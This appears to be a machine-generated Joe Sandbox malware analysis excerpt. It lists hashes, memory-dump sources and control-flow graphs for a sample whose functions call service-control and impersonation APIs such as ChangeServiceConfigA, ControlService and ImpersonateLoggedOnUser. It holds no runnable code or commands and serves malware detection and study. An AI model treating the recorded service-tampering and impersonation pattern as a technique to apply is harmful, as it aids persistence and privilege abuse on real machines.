                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: 9e1bbcd8aa3e5cf114a7cc95fec459383898e7e66efa54e41f3b1e8fbb65e1a9
                                                                                                                                                                                                                                            • Instruction ID: dd3c3ba7d22f4b52861300945e2225c069524c56f88487221ced9ddc92d363cd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e1bbcd8aa3e5cf114a7cc95fec459383898e7e66efa54e41f3b1e8fbb65e1a9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF0F8703083018FCB54EBB4AE4A6583BA1FB16321B50460BE462862F0CF3E8556CA21
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:49.6%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:22.9%
                                                                                                                                                                                                                                            Total number of Nodes:35
                                                                                                                                                                                                                                            Total number of Limit Nodes:2

                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                            • API String ID: 2645101109-2766056989
                                                                                                                                                                                                                                            • Opcode ID: fe845de2e4baa0d7ed072dd1ba3015e0ad32c9c12d7c3f1f8e66e283fa4487ae
                                                                                                                                                                                                                                            • Instruction ID: 0695481b314bd8c81cc493ff736064183dea9829bdf6f0cfb860d8b8220fbb56
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe845de2e4baa0d7ed072dd1ba3015e0ad32c9c12d7c3f1f8e66e283fa4487ae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63918F30618A4D8FEB68DF28C8457E977D1EF55351F00417AE84ECB292DF74A481CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 60 7ff815f51b10-7ff815f51b17 61 7ff815f51b19-7ff815f51b21 60->61 62 7ff815f51b22-7ff815f51b5d 60->62 61->62 64 7ff815f51aec-7ff815f51b09 62->64 65 7ff815f51b5f-7ff815f51bd8 62->65 68 7ff815f51bda-7ff815f51be9 65->68 69 7ff815f51c36-7ff815f51c68 65->69 68->69 70 7ff815f51beb-7ff815f51bee 68->70 76 7ff815f51c6a-7ff815f51c7a 69->76 77 7ff815f51cc7-7ff815f51d00 69->77 71 7ff815f51c28-7ff815f51c30 70->71 72 7ff815f51bf0-7ff815f51c03 70->72 71->69 74 7ff815f51c05 72->74 75 7ff815f51c07-7ff815f51c1a 72->75 74->75 75->75 78 7ff815f51c1c-7ff815f51c24 75->78 76->77 79 7ff815f51c7c-7ff815f51c7f 76->79 83 7ff815f51d5e-7ff815f51d97 77->83 84 7ff815f51d02-7ff815f51d11 77->84 78->71 81 7ff815f51cb9-7ff815f51cc1 79->81 82 7ff815f51c81-7ff815f51c94 79->82 81->77 85 7ff815f51c98-7ff815f51cab 82->85 86 7ff815f51c96 82->86 94 7ff815f51d99-7ff815f51da9 83->94 95 7ff815f51df6-7ff815f51e2f 83->95 84->83 87 7ff815f51d13-7ff815f51d16 84->87 85->85 88 7ff815f51cad-7ff815f51cb5 85->88 86->85 89 7ff815f51d18-7ff815f51d2b 87->89 90 7ff815f51d50-7ff815f51d58 87->90 88->81 92 7ff815f51d2d 89->92 93 7ff815f51d2f-7ff815f51d42 89->93 90->83 92->93 93->93 96 7ff815f51d44-7ff815f51d4c 93->96 94->95 97 7ff815f51dab-7ff815f51dae 94->97 103 7ff815f51e8e-7ff815f51ec7 95->103 104 7ff815f51e31-7ff815f51e41 95->104 96->90 99 7ff815f51de8-7ff815f51df0 97->99 100 7ff815f51db0-7ff815f51dc3 97->100 99->95 101 7ff815f51dc5 100->101 102 7ff815f51dc7-7ff815f51dda 100->102 101->102 102->102 105 7ff815f51ddc-7ff815f51de4 102->105 110 7ff815f51ec9-7ff815f51ed9 103->110 111 7ff815f51f26-7ff815f51fb0 103->111 104->103 106 7ff815f51e43-7ff815f51e46 104->106 105->99 108 7ff815f51e48-7ff815f51e5b 106->108 109 7ff815f51e80-7ff815f51e88 106->109 112 7ff815f51e5d 108->112 113 7ff815f51e5f-7ff815f51e72 108->113 109->103 110->111 114 7ff815f51edb-7ff815f51ede 110->114 121 7ff815f51fb4-7ff815f51fe2 ChangeServiceConfigA 111->121 112->113 113->113 115 7ff815f51e74-7ff815f51e7c 113->115 116 7ff815f51f18-7ff815f51f20 114->116 117 7ff815f51ee0-7ff815f51ef3 114->117 115->109 116->111 119 7ff815f51ef5 117->119 120 7ff815f51ef7-7ff815f51f0a 117->120 119->120 120->120 122 7ff815f51f0c-7ff815f51f14 120->122 123 7ff815f51fea-7ff815f51ffc call 7ff815f52049 121->123 124 7ff815f51fe4 121->124 122->116 126 7ff815f52001-7ff815f52025 123->126 124->123 126->121 127 7ff815f52027-7ff815f5202d 126->127 128 7ff815f5202f 127->128 129 7ff815f52034-7ff815f52048 127->129 128->129
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeConfigService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3849694230-0
                                                                                                                                                                                                                                            • Opcode ID: 786dcebbf7de9763d7d3b1fad4c68cce32ebaec42d4725c9a84ecf154c164137
                                                                                                                                                                                                                                            • Instruction ID: 007c18e3a52bc173412b7254472e1e4b09712be4af0e0f18786f2e749574087d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 786dcebbf7de9763d7d3b1fad4c68cce32ebaec42d4725c9a84ecf154c164137
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6028330928E4D4FEB68EE28D8467F977D0FB54751F10426EE88EC7291DF74A5818B82
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 130 7ff815f50148-7ff815f50c8d 133 7ff815f50c1c-7ff815f50c2d 130->133 134 7ff815f50c8f-7ff815f50ce5 130->134 137 7ff815f50ce7-7ff815f50cf6 134->137 138 7ff815f50d40-7ff815f50d6a 134->138 137->138 139 7ff815f50cf8-7ff815f50cfb 137->139 145 7ff815f50d6d-7ff815f50daa OpenServiceA 138->145 140 7ff815f50cfd-7ff815f50d10 139->140 141 7ff815f50d35-7ff815f50d3d 139->141 143 7ff815f50d14-7ff815f50d27 140->143 144 7ff815f50d12 140->144 141->138 143->143 146 7ff815f50d29-7ff815f50d31 143->146 144->143 147 7ff815f50dac 145->147 148 7ff815f50db2-7ff815f50dde call 7ff815f50e02 145->148 146->141 147->148 148->145 151 7ff815f50de0-7ff815f50de6 148->151 152 7ff815f50ded-7ff815f50e01 151->152 153 7ff815f50de8 151->153 153->152
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c1bab9b4226afd130ef5fa869a96e698bc091702da2fa4f442205a29d2b7fba8
                                                                                                                                                                                                                                            • Instruction ID: c5c522297ba49609b00887d92de8e066de202768dfbfd3f06b733bbac19ee8c6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1bab9b4226afd130ef5fa869a96e698bc091702da2fa4f442205a29d2b7fba8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33519330918A4D8FEB58EE28D84A7F937D5FB59351F10416EE84EC7262DF74A842CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 154 7ff815f50c34-7ff815f50c3b 155 7ff815f50c3d-7ff815f50c45 154->155 156 7ff815f50c46-7ff815f50c8d 154->156 155->156 158 7ff815f50c1c-7ff815f50c2d 156->158 159 7ff815f50c8f-7ff815f50ce5 156->159 162 7ff815f50ce7-7ff815f50cf6 159->162 163 7ff815f50d40-7ff815f50d6a 159->163 162->163 164 7ff815f50cf8-7ff815f50cfb 162->164 170 7ff815f50d6d-7ff815f50daa OpenServiceA 163->170 165 7ff815f50cfd-7ff815f50d10 164->165 166 7ff815f50d35-7ff815f50d3d 164->166 168 7ff815f50d14-7ff815f50d27 165->168 169 7ff815f50d12 165->169 166->163 168->168 171 7ff815f50d29-7ff815f50d31 168->171 169->168 172 7ff815f50dac 170->172 173 7ff815f50db2-7ff815f50dde call 7ff815f50e02 170->173 171->166 172->173 173->170 176 7ff815f50de0-7ff815f50de6 173->176 177 7ff815f50ded-7ff815f50e01 176->177 178 7ff815f50de8 176->178 178->177
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3098006287-0
                                                                                                                                                                                                                                            • Opcode ID: fa40335840bde5a3a4b5fe6742ac2974c039fb4c259afff3bd4875a7c9a5dcd8
                                                                                                                                                                                                                                            • Instruction ID: eeec5efcd88a31d26e0de5ce8944e3e24c00d472a862498f0a6ad0607cf26d27
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa40335840bde5a3a4b5fe6742ac2974c039fb4c259afff3bd4875a7c9a5dcd8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA519434918A4D8FEB58EF28C8467F97BD5FB59351F10422AE84EC7292DF74A841CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 179 7ff815f50b2d-7ff815f50bb8 183 7ff815f50bba-7ff815f50bbf 179->183 184 7ff815f50bc2-7ff815f50bc7 179->184 183->184 185 7ff815f50bc9-7ff815f50bce 184->185 186 7ff815f50bd1-7ff815f50c08 OpenSCManagerW 184->186 185->186 187 7ff815f50c0a 186->187 188 7ff815f50c10-7ff815f50c2d 186->188 187->188
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ManagerOpen
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1889721586-0
                                                                                                                                                                                                                                            • Opcode ID: 5075e2b765d2bf93f9b32694ee02a6736662f42ef2e2a636c039e8fb20e80762
                                                                                                                                                                                                                                            • Instruction ID: f969eaf5ec887e318db4d299d379889773e4f20fd25ecc7440818d7bf8ee008d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5075e2b765d2bf93f9b32694ee02a6736662f42ef2e2a636c039e8fb20e80762
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31B33191CA188FDB28DF98D8896FABBF0EB55321F00422FD04AD7652CF70A445CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 189 7ff815f51a1d-7ff815f51a25 190 7ff815f51a28-7ff815f51ad9 ControlService 189->190 191 7ff815f51a27 189->191 194 7ff815f51adb 190->194 195 7ff815f51ae1-7ff815f51b09 190->195 191->190 194->195
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ControlService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 253159669-0
                                                                                                                                                                                                                                            • Opcode ID: 87cb68f499f872f34862a55ee82103b556841e2ac965cb9469bfb067d1a97fea
                                                                                                                                                                                                                                            • Instruction ID: e52bd8667ea503622549c19df822a56458df3c7673ce8c6a33b3a6276f073f50
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87cb68f499f872f34862a55ee82103b556841e2ac965cb9469bfb067d1a97fea
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A31D53191CA588FDB18DF9CD845AF97BE0EB55721F04417EE08AD3262CB64A446CB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 197 7ff815f5108a-7ff815f510b3 198 7ff815f510be-7ff815f51152 FindCloseChangeNotification 197->198 199 7ff815f510b5-7ff815f510bd 197->199 202 7ff815f5115a-7ff815f51181 198->202 203 7ff815f51154 198->203 199->198 203->202
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: 77aa77fc111622bd79aef8218e80e6e2ecae3e732a39a326e2fc6a9337daf225
                                                                                                                                                                                                                                            • Instruction ID: c4e2ea25178c64b17356c756cd4330dbdad00529b34ccc6e4b9a4093235b2815
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77aa77fc111622bd79aef8218e80e6e2ecae3e732a39a326e2fc6a9337daf225
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D31E63090CA889FDB0ADB688805BA97FF0EF57321F04429FD089D71A2DA69A456CB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 204 7ff815f51760-7ff815f51767 205 7ff815f51769-7ff815f51771 204->205 206 7ff815f51772-7ff815f51802 ImpersonateLoggedOnUser 204->206 205->206 209 7ff815f5180a-7ff815f51831 206->209 210 7ff815f51804 206->210 210->209
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2216092060-0
                                                                                                                                                                                                                                            • Opcode ID: 22cf90db89fca2009526237c4e23d0c46c297a5a3f1af85e3da5b3331d1ce1c6
                                                                                                                                                                                                                                            • Instruction ID: 8130977f1f1402a226d0424482ebc5532ab0f073fa72c00d7f83bf7c53efbfe2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22cf90db89fca2009526237c4e23d0c46c297a5a3f1af85e3da5b3331d1ce1c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0431D53190CA4C8FEB58DF68D845BF9BBE0EB56321F00426ED049D35A2DB74A456CB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d9b2e77751565786805f8090692fcd36bb9d04d4240412b9d9cc70970fb2cf86
                                                                                                                                                                                                                                            • Instruction ID: 276eb1d1eaa9b66eabfa1b73bdce6828e70bd54ddaefa4e08e0067a2109727eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9b2e77751565786805f8090692fcd36bb9d04d4240412b9d9cc70970fb2cf86
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6229E347006159FDB15DB78C864A6EBBF6AF89700F1584A9E906CB3A2DF74DC02CB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 94b9c60d6062ab288e79873894255be4f5bf3e29fe8eaffdbe09fd0daeffb817
                                                                                                                                                                                                                                            • Instruction ID: 7eb476287bf4a479794fcfc08ab47dc9da2e16d7455ecbdae1dbb5f79020d3ea
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94b9c60d6062ab288e79873894255be4f5bf3e29fe8eaffdbe09fd0daeffb817
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C13EC38941204FFCF2A9B61E55199DB732FF99307B1084BAEC1167B548A3F9A92DF40
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 90d602b2afbdc623861f396aacbc120baf21b3c172fa6e70cc03324460c7ff4c
                                                                                                                                                                                                                                            • Instruction ID: de084ea79b6e56ecd119f07f0734c52e4cd8ed51f321e0667d784e41bb0e7263
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90d602b2afbdc623861f396aacbc120baf21b3c172fa6e70cc03324460c7ff4c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA13EC38941204FFCF2A9B61E55199DB732FF99307B1084BAEC1167B548A3F9A92DF40
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: kfq^
                                                                                                                                                                                                                                            • API String ID: 0-449628588
                                                                                                                                                                                                                                            • Opcode ID: 66f851ea32701c7fd14f6c795e25a474ac0c48a7fd2f4df60c2ec9bcf54c4bb2
                                                                                                                                                                                                                                            • Instruction ID: d10d40e527b58838e6bc9e943787efec2d9927eac28e41701e50d819b329bd5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66f851ea32701c7fd14f6c795e25a474ac0c48a7fd2f4df60c2ec9bcf54c4bb2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3D1E074E01229CFDB28DF69C944BEDBBB2FB89304F1085AAD509B7290DB745A85CF50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: kfq^
                                                                                                                                                                                                                                            • API String ID: 0-449628588
                                                                                                                                                                                                                                            • Opcode ID: 210328d58e8b58a8cd761800cf0380bb2f9aad88b9a8801d2a8a4546a094eb98
                                                                                                                                                                                                                                            • Instruction ID: 88de2adbd0a9d79cde7b3eb89319f0cc2b438ccd93eb826e08fa87740c0a79dc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 210328d58e8b58a8cd761800cf0380bb2f9aad88b9a8801d2a8a4546a094eb98
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A91EF74E01228CFEB68DF69C9447DDBBB2BB89304F1085EAD509B7250DB745A85CF50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: fq^
                                                                                                                                                                                                                                            • API String ID: 0-3723657888
                                                                                                                                                                                                                                            • Opcode ID: 58033288a249f9bced1e9825854b61fe0515664761083d961698a4ce046a5ed4
                                                                                                                                                                                                                                            • Instruction ID: 99ae3193893168a03b57ae46d8065ca7dda5e67e90c3fbf8089fa83fdb9a625c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58033288a249f9bced1e9825854b61fe0515664761083d961698a4ce046a5ed4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F21A1A290F3D65FDB13977898A40D43FB09E23158B1944DFD081CB1B3E559894EC766
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 45dd9c94972359a911eb55a18ee2518260adb268d9d24941b7603e808c4761f1
                                                                                                                                                                                                                                            • Instruction ID: 45d15d26c949637b3dca2a0f01fb033887455ac1e5e9dd4a4edfb4256adcf5d4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45dd9c94972359a911eb55a18ee2518260adb268d9d24941b7603e808c4761f1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB028D35B006199FCB14DFA9D894AADBBB2FF88310F148469E8069B391DB75EC41CF91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0224bf72b709b68a93695dd5fd2db4e46a955585a304a5a4d2752c5f76b3e8b0
                                                                                                                                                                                                                                            • Instruction ID: bc850e06c46eb0e96a720b974267f831e967a4720d9080dc939a69b4777533fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0224bf72b709b68a93695dd5fd2db4e46a955585a304a5a4d2752c5f76b3e8b0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77C1E974A002199FDB14DFA8D854AAEBBF6FF99300F108069E506EB3A5DB359C42CF51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8c526d06035867fe54afce937d828596586ff7b20f88c82552281e5c7598916e
                                                                                                                                                                                                                                            • Instruction ID: d00515fe62f7b109d7094c22df68db4c1c3bfec0897436ba8ba5726bb81e0b9b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c526d06035867fe54afce937d828596586ff7b20f88c82552281e5c7598916e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3091E531B006659FCB269FB894151BDBFF2FF94211B54C06AE846A7342DF358D02EB51
